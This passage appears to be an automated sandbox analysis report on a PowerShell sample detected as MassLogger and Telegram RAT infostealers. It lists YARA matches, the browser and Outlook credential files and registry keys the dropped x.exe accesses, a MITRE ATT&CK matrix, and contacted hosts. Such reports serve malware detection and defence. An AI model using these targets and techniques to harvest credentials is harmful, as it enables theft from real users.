                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Yara detected MSIL Logger
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 4.2.x.exe.2b89bb4.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.x.exe.2b89bb4.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.x.exe.2b85378.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.x.exe.2b85378.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.x.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.x.exe.4329590.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.x.exe.4329590.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.1134625680.0000000004309000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.3552025074.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1133468244.0000000002B85000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1134625680.0000000004329000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: x.exe PID: 6428, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: x.exe PID: 4624, type: MEMORYSTR
                      Yara detected MassLogger RAT
                      Source: Yara matchFile source: 5.2.x.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.x.exe.4329590.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.x.exe.4329590.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.1134625680.0000000004309000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.3552025074.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1134625680.0000000004329000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: x.exe PID: 6428, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: x.exe PID: 4624, type: MEMORYSTR
                      Yara detected Telegram RAT
                      Source: Yara matchFile source: 5.2.x.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.x.exe.4329590.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.x.exe.4329590.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.1134625680.0000000004309000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.3552025074.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.3555469132.0000000002D22000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1134625680.0000000004329000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: x.exe PID: 6428, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: x.exe PID: 4624, type: MEMORYSTR
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Users\user\AppData\Local\Temp\x.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Tries to steal Mail credentials (via file / registry access)
                      Source: C:\Users\user\AppData\Local\Temp\x.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: Yara matchFile source: 5.2.x.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.x.exe.4329590.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.x.exe.4329590.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.1134625680.0000000004309000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.3552025074.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.3555469132.0000000002D22000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1134625680.0000000004329000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: x.exe PID: 6428, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: x.exe PID: 4624, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Yara detected MSIL Logger
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 4.2.x.exe.2b89bb4.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.x.exe.2b89bb4.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.x.exe.2b85378.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.x.exe.2b85378.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.x.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.x.exe.4329590.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.x.exe.4329590.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.1134625680.0000000004309000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.3552025074.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1133468244.0000000002B85000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1134625680.0000000004329000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: x.exe PID: 6428, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: x.exe PID: 4624, type: MEMORYSTR
                      Yara detected MassLogger RAT
                      Source: Yara matchFile source: 5.2.x.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.x.exe.4329590.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.x.exe.4329590.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.1134625680.0000000004309000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.3552025074.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1134625680.0000000004329000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: x.exe PID: 6428, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: x.exe PID: 4624, type: MEMORYSTR
                      Yara detected Telegram RAT
                      Source: Yara matchFile source: 5.2.x.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.x.exe.4329590.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.x.exe.4329590.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.1134625680.0000000004309000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.3552025074.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.3555469132.0000000002D22000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1134625680.0000000004329000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: x.exe PID: 6428, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: x.exe PID: 4624, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                      Native API                      		1
                      DLL Side-Loading                      		1
                      DLL Side-Loading                      		1
                      Disable or Modify Tools                      		1
                      OS Credential Dumping                      		2
                      File and Directory Discovery                      		Remote Services11
                      Archive Collected Data                      		11
                      Ingress Tool Transfer                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      PowerShell                      		Boot or Logon Initialization Scripts112
                      Process Injection                      		1
                      Deobfuscate/Decode Files or Information                      		1
                      Input Capture                      		23
                      System Information Discovery                      		Remote Desktop Protocol1
                      Data from Local System                      		11
                      Encrypted Channel                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)2
                      Obfuscated Files or Information                      		Security Account Manager1
                      Query Registry                      		SMB/Windows Admin Shares1
                      Screen Capture                      		1
                      Non-Standard Port                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                      Software Packing                      		NTDS111
                      Security Software Discovery                      		Distributed Component Object Model1
                      Email Collection                      		2
                      Non-Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Timestomp                      		LSA Secrets2
                      Process Discovery                      		SSH1
                      Input Capture                      		33
                      Application Layer Protocol                      		Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      DLL Side-Loading                      		Cached Domain Credentials41
                      Virtualization/Sandbox Evasion                      		VNC1
                      Clipboard Data                      		Multiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                      Masquerading                      		DCSync1
                      Application Window Discovery                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job41
                      Virtualization/Sandbox Evasion                      		Proc Filesystem1
                      System Network Configuration Discovery                      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt112
                      Process Injection                      		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1638293 Sample: DON.ps1 Startdate: 14/03/2025 Architecture: WINDOWS Score: 100 34 reallyfreegeoip.org 2->34 36 mail.tsengg.com 2->36 38 2 other IPs or domains 2->38 48 Found malware configuration 2->48 50 Malicious sample detected (through community Yara rule) 2->50 52 Antivirus detection for dropped file 2->52 56 9 other signatures 2->56 8 powershell.exe 16 2->8         started        12 svchost.exe 1 1 2->12         started        15 notepad.exe 5 2->15         started        signatures3 54 Tries to detect the country of the analysis system (by using the IP) 34->54 process4 dnsIp5 30 C:\Users\user\AppData\Local\Temp\x.exe, PE32 8->30 dropped 64 Found suspicious powershell code related to unpacking or dynamic code loading 8->64 66 Powershell drops PE file 8->66 17 x.exe 15 4 8->17         started        22 conhost.exe 8->22         started        46 127.0.0.1 unknown unknown 12->46 file6 signatures7 process8 dnsIp9 32 176.65.144.3, 49707, 80 PALTEL-ASPALTELAutonomousSystemPS Germany 17->32 28 C:\Users\user\AppData\Local\Temp\RUNPEE.dll, PE32 17->28 dropped 58 Antivirus detection for dropped file 17->58 60 Multi AV Scanner detection for dropped file 17->60 62 Injects a PE file into a foreign processes 17->62 24 x.exe 12 17->24         started        file10 signatures11 process12 dnsIp13 40 mail.tsengg.com 103.21.58.29, 49710, 49720, 49722 PUBLIC-DOMAIN-REGISTRYUS United Arab Emirates 24->40 42 checkip.dyndns.com 132.226.247.73, 49708, 49719, 49721 UTMEMUS United States 24->42 44 3 other IPs or domains 24->44 68 Tries to steal Mail credentials (via file / registry access) 24->68 70 Tries to harvest and steal browser information (history, passwords, etc) 24->70 signatures14

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.